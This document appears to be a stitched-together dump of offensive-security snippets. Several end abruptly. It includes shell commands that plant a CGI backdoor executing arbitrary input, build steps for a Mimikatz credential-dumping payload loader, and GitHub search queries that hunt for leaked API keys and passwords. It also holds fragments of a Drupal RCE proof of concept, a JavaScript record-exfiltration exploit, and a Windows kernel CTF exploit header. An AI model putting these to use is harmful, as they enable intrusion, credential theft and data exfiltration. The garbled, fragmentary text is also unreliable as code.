xer0dayz 1N3

	cd /tmp
	mkdir cgi-bin
	echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi
	echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi
	echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi
	chmod +x ./cgi-bin/backdoor.cgi
	python -m http.server --cgi

	1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases

	2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a

	3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.

	4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.

	6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"

	https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
	https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
	https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
	https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
	https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
	https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI

	#!/usr/bin/env python3

	# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
	# 2019 @leonjza

	# Technical details for this exploit is available at:
	# https://www.drupal.org/sa-core-2019-003
	# https://www.ambionics.io/blog/drupal8-rce
	# https://twitter.com/jcran/status/1099206271901798400

	if [ "$#" -eq 0 ] \|\| [ "$#" -gt 2 ] \|\| [[ $* == --help ]] \|\| [[ $* == -h ]]; then
	echo "Usage ./getValidDNS.sh [output file] [optional: timeout (seconds)]"
	exit 1
	fi

	typedef struct tagCREATELINKDATA {
	ULONG dwFlags;
	WCHAR szLinkName[MAX_PATH]; // + 0x20C
	WCHAR szExeName[MAX_PATH]; // + 0x414
	WCHAR szParams[MAX_PATH]; // + 0x61C
	WCHAR szWorkingDir[MAX_PATH]; // + 0x824
	WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
	WCHAR szExpExeName[MAX_PATH]; // + 0xC34
	WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
	WCHAR szFolder[MAX_PATH]; // + 0x1044

	//Exploit Code by Shawar Khan

	var data_chunks = '';
	// Capturing Records from API
	fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) {

	// Holds the records in as String
	var allrecords = data;

	// converting response to JSON

	// WCTF 2018 "searchme" task exploit
	//
	// Author: Mateusz "j00ru" Jurczyk
	// Date: 6 July 2018
	// Tested on: Windows 10 1803 (10.0.17134.165)
	//
	// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
	#include <Windows.h>
	#include <winternl.h>
	#include <ntstatus.h>